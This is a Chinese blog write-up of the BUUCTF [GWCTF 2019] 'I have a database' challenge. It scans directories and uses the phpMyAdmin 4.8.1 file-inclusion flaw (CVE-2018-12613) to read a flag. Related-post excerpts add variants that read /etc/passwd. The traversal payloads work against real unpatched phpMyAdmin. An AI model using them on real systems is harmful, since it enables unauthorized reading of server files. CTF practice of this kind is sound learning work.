[GWCTF 2019]我有一个数据库 1

于 2022-07-21 19:59:24 发布
阅读量800 收藏 1
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125917957
版权
本文详细介绍了GWCTF2019比赛中的一道题目,涉及网站目录扫描、robots.txt检查、phpmyadmin数据库的利用以及通过框架代码漏洞构造payload来尝试获取flag的过程。尽管在常规路径下未找到flag,但通过数据库层面的漏洞利用可能成为解题关键。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[GWCTF 2019]我有一个数据库 1

题目

BUUCTF的[GWCTF 2019]我有一个数据库 1
在这里插入图片描述

一、扫描网站目录

使用扫描工具

python dirsearch.py -u http://377aa9cc-77c3-4f36-ac51-ec159fc347ae.node4.buuoj.cn:81/ -e *

在这里插入图片描述在这里插入图片描述

二、查看robots文件

1.查看robots.txt
在这里插入图片描述
2.访问phpinfo.php
在这里插入图片描述
没有发现flag

三、查看数据库

phpmyadmin 数据库

在这里插入图片描述该版本存在框架代码漏洞,可以利用(百度)

四、构造payload

phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag
林本
关注
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 609
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2869
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
[GWCTF 2019]我有一个数据库1
qq_63169208的博客
06-26 491
进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch去扫一下了可以看到有个/phpmyadmin界面访问一下得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)接下来执行一下漏洞复现payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd执行成功,既然/etc/pa
[GWCTF 2019]我有一个数据库
夜幕下的灯火阑珊的博客
05-14 1455
知识点 phpmyadmin任意文件读取 dirb扫描到后台有phpmyadmin目录,访问一下 版本为4.81,经查询,存在远程文件读取漏洞 直接上payload读取passwd文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读...
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1800
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 435
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 242
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
web buuctf [GWCTF 2019]我有一个数据库1
weixin_44214568的博客
03-26 3541
1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 640
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
BUUCTF_Web_[GWCTF 2019]我有一个数据库
阿刁〇的博客
08-22 733
BUUCTF_Web_[GWCTF 2019]我有一个数据库 该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞* 漏洞分析 phpMyAdmin 是一个PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在
NO.2-6 [GWCTF 2019]我有一个数据库
nigo134的博客
07-26 191
该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞 使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入 查看相关版本信息 百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) &&amp..
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1804
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
[GWCTF 2019]枯燥的抽奖 1
最新发布
08-26
根据提供的源代码和引用的内容来看,[GWCTF 2019]枯燥的抽奖 1是一道PHP伪随机数的题目。该题目中使用了mt_rand()函数生成伪随机数,并通过种子来控制生成的序列。通过审计代码,我们可以看到check.php是存在的,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值